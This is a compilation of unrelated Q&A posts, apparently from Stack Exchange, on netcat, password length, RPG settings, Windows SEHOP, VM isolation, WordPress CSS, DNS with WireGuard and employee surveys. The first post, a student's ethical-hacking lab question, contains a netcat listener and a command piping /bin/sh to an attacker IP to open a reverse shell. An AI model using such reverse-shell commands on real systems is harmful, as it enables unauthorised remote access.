Setting up netcat session over the internet [closed]

I am a student working on an ethical hacking project.

How do I set a netcat session over the internet? My project requires us to use a public service like AWS or DigitalOcean as the victim machine and my own PC has an attacker machine. I tried the following commands:

Attacker’s machine running the latest Kali 2020.3 (Tried NAT VM setup and live booting too):

nc –nlvp 5555 

Victim’s machine running ubuntu 18.04.05:

/bin/sh | nc <PUBLIC IP OF ATTACKER's MACHINE> 5555 

But it just does not open a reverse shell on the attacker’s machine. Did I miss out anything?

Is there any security risk in not setting a maximum password length?

I’m a listener of the podcast "Security Now" where Steve Gibson, a security expert, often claims that there are no reasons to limit the number of characters a user can use in their passwords when they create an account on a website. I have never understood how it is even technically possible to allow an unlimited number of characters and how it could not be exploited to create a sort of buffer overflow.

I found a related question here, but mine is slightly different. The author of the other question explicitly mentions in their description that they understand why setting a maximum length of 100000000 characters would be a problem. I actually want to know why it would be a problem, is it like I have just said because of buffer overflows? But to be vulnerable to a buffer overflow, shouldn’t you have a sort of boundary which you can’t exceed in the first place, and thus if you didn’t limit the number of characters, would you even have this risk? And if you are thinking about starving a computer’s RAM or resources, could even a very large password be a problem?

So, I guess it is possible not to limit the number of characters in a password: all you’d have to do would be to not use the maxlength attribute or not have a password validation function on the server side. Would that be the secure way to do it? And if it is, is there any danger in allowing an unlimited number of characters for your passwords? On the other hand, NIST recommends developers to limit passwords to 256 characters. If they take the time to recommend a limitation, does it mean there has to be one?

How do I make players more comfortable in an unusual historical setting?

I run a lot of games/write systems set in specific historical/cultural contexts, because I like rpgs as a way to explore them and think they provide a great sense of place. However, I tend not to choose more well-known settings, like WWII Europe or Victorian England, because they’ve already been so thoroughly explored that they lose some of the uniqueness factor I’m interested in.

So far the people I’ve played/playtested them with have been enthusiastic about the ideas, but the games tend to start slow as they are hesitant to be creative because they don’t want to ‘be wrong’ about how things would work in that time and place. However, I’m not so much set on perfectly replicating, say, 19th century Hong Kong in a given game as I am interested in seeing the game evolve from an off-beat starting point.

Do people think the best solution to this is to separate the actual history from the game history (i.e. emphasize that this is an alternate universe and they can feel free to depart as much as they want to from the historical details) or to provide a lot of background information to ground them as much as possible in the time period so that they’re more comfortable there?

Windows Exploit Protection: what is SEHOP setting: “TelemetryOnly” for?

I’m reading myself into the different exploit protection methods from MS. One is SEHOP, if I check it e.g. with PS:

Get-ProcessMitigation -System

I get:

    Enable                             : NOTSET     TelemetryOnly                      : OFF     Audit                              : NOTSET     Override SEHOP                     : False 

What is "TelemetryOnly" ? Internet search was not successful so fare.

Thanks for hints and resources!

Is there a plausible explanation for a large number of armed adventurers in a fantasy RPG setting?

I’m working on a Dungeons & Dragons setting. I’m looking for a comprehensive and logical explanation why, in a feudal society similar to Western Europe in the Middle Ages, there might be bands of armed adventurers (both male and female) wandering the country, slaying monsters, and frequenting taverns.

Does it follow that if you introduce magic and monsters guarding dungeons filled with treasure into a historical medieval setting, you’ll see an adventuring class emerge? Have there been any real world analogues to an “adventuring class” (obviously without the monsters and magic)?

In setting up a VM, does the Bridged or NAT configuration provide more separation security?

I am setting up a few VM’s (assume VB w/ Linux). They will all be on the same PC host (assume Linux) and the intent is to have all the VM’s handle separate functions (business, personal finance, and fuck off time) and have no connection to each other through the network or otherwise. I want to set them up in a way that creates the best security as far as separation from each other and the host. The host will function only to host the VM’s. I would prefer to use one VPN subscription, which has been purchased anonymously. However, if this compromises the separation of these VM’s, then I would consider changing the approach.

So, the question here is, given this setup, which method (Bridged or NAT) would work better as far as providing the least amount of leaked information between the VM’s/Host?

Additional information:

The plan is to setup software firewalls allowing only outgoing connections for the VM’s and the host. I am still looking into whether this is best approach (secure and user friendly approach).

Any other board allowable suggestions would also be appreciated.

Getting and setting CSS variables with JQuery in WordPress backend fails

On a WordPress settings page of a plugin I develop, I have to implement a visual element that I want to change by JavaScript. I’ve got my solution working as it should and tested it on code-pen and JSFiddle. But when loading the equivilant code including the script, it will not work.

Here is the schema I’m using: HTML

<div id="origin" class="box"></div> <div id="target" class="box"></div> <button id="toggle-color">Toggle Color</button> 

CSS

:root {   --origin-color: red;   --target-color: blue; }  .box{   width: 150px;   height: 150px; }  #origin{   background-color: var(--origin-color); }  #target{   background-color: var(--target-color); } 

JS (jQuery 3.4.1)

(function( $   ) {     'use strict';     $  (document).ready(function(){               $  ('#toggle-color').on('click', function(event){         event.preventDefault();         var root = $  (":root");         var origin_color = '--origin-color';         var target_color = '--target-color';         var origin_value = root.css(origin_color);         var target_value = root.css(target_color);         root.css(origin_color, target_value);           root.css(target_color, origin_value);         return false;       });   });     })( jQuery ); 

The Problem I have is, that while it is working in test environments in the WordPress backend, the lines where I fetch the colors with

var origin_value = root.css(origin_color); var target_value = root.css(target_color); 

returns ‘undefined’, so the next line where I switch the colors fails.

See my example here: https://jsfiddle.net/tomybyte/hvbc3zu1/6/

I don’t understand why it is working in JSFiddle and code-pen but not when loading in WordPress (yes the code is loaded, I checked that!)

Is there a security vulnerability in setting a public DNS entry to a private IP Address?

I recently set up a wireguard server-network configuration with a home server and client devices. I have one main domain that I hope to route everything through via subdomains (in this example, abc.domain.com, def.domain.com, etc.). I hope to use nginx to do this routing.

Is is possible/secure/recommended to register a private IP address (specifically of my home server within the wireguard network, i.e. 10.27.0.1/24) in a public DNS (e.g. google DNS), so that if you run ping abc.domain.com you would get back 10.27.0.1? I found a few questions that answer a question that are close to this one (this one covers private IP for public DNS for MX records, this one talks about having A records without much mention of VPN), and the overall picture I get from these links is that it is possible, but not technically perfect since a hacker gets a small piece of info about your local network (wireguard network is 10.27.0.1/24…isn’t this relatively a moot point given it’s behind wireguard, assuming I have all of the usual safety checks in place (no remote ssh (root or otherwise) unless on wireguard network, fail2ban, no password authentication for ssh, etc.)?

This IP (10.27.0.1) would be only accessible through the wireguard network, so I don’t think it would expose the services to the internet. I want to do this so that I don’t have to setup local DNS entries on each device, as I don’t believe this is possible on a phone, and it would be ideal to make one change [i.e. set the DNS entry to 10.27.0.1] and then have each device just running a simple DNS query for abc.domain.com. This would also have the added benefit of only opening the wireguard port, and keeping the firewall closed for 80 + 443.

A corollary of this question is how best do you manage certs/ssl if this is possible? I managed to get certbot working by temporarily exposing port 80 on my server to acquire the certs for abc.domain.com, and then closing 80 to only access the webserver via wireguard through the wireguard port + nginx. I can already see one downside to this method – having to manually open port 80 everytime certbot wants to get new certificates (I believe by default this is every 60 days). I understand that wireguard is approximately as secure as SSL/HTTPS, but for my personal OCD I would prefer to have the connection secured through https on top of wireguard. I’m somewhat iffy on the details of managing certs for wildcards, but could I do it with my main domain.com (that is pointing to a internet facing site) and have it propagate to the subdomains, allowing it to be renewed through that? (this question seems to indicate so)

My goal long term is to expand this into a network that includes family/close friends as a type of ‘intranet’ for sharing photos and using other self-hosted services.

My nginx config file (abc.conf) looks something like this:

server {    server_name abc.domain.com;   # DNS Entry of abc.domain.com is 10.27.0.1, which is the local IP for the wireguard network   # SHOULD NOT be accessible outside of wireguard network    location / {       proxy_pass http://127.0.0.1:8000; #Redirects to local service on port 8000   }       listen [::]:443 ssl; # managed by Certbot     listen 443 ssl; # managed by Certbot      // SSL Certs provided by certbot [removed manually]     // .     // .     // .  } 

How can I outfit the Caves of Chaos to fit contextually with the Dragonlance setting?

I have been tasked with running a game of The Keep on the Borderlands adventure module, however, I want to have a campaign in the Dragonlance setting, in the age of mortals.

As the characters will be starting in the City of Solace, without other advisement I plan to put the "Caves of Chaos" (location from the adventure module) in the Kharolis Mountains.

Now the question I am faced with, what races / creatures should I put in the caves, and what is their motivation or reason for being there that would be consistent with the Dragonlance setting?

Reading through The Keep on The Borderlands, the most apparent roadblock (among others) is that Orcs and Kobolds are not in the Dragonlance setting. I am looking for clarity on what would appropriately fill such a cavern that could motivate adventurers to explore/root out the area.

Setting Up Private Employee Survey Area On Company Website [closed]

Long-time listener, first-time caller.

Our company has about 120 Employees and growing. We are at a point where we need to collect self-evaluations and other survey data from our workforce but only our administrators and managers have user accounts with our Google Apps (because those costs add up!) Since we can’t require anyone to have a personal Google account, we don’t have a reliable way to verify or authenticate the rest of our employees as they fill out surveys. Our solution so far is to hand out paper forms and do the data entry manually.

I’ve been charged with finding a solution. I was thinking it’d be possible to set up a member area of sorts on our website where employees could register and log in for surveys and such. I could get Google Sheets talking to the survey database and we’d be off to the races.

Our public-facing site is hosted on SquareSpace, if that makes any difference.

Anyway, the world has changed many times over since I’ve had anything to do with the back end of a website (it’s true; I’m not a pro) and I’m completely unsure of where to start, but I can probably build it once I get my bearings so I’m here looking for suggestions on how to start.

Help?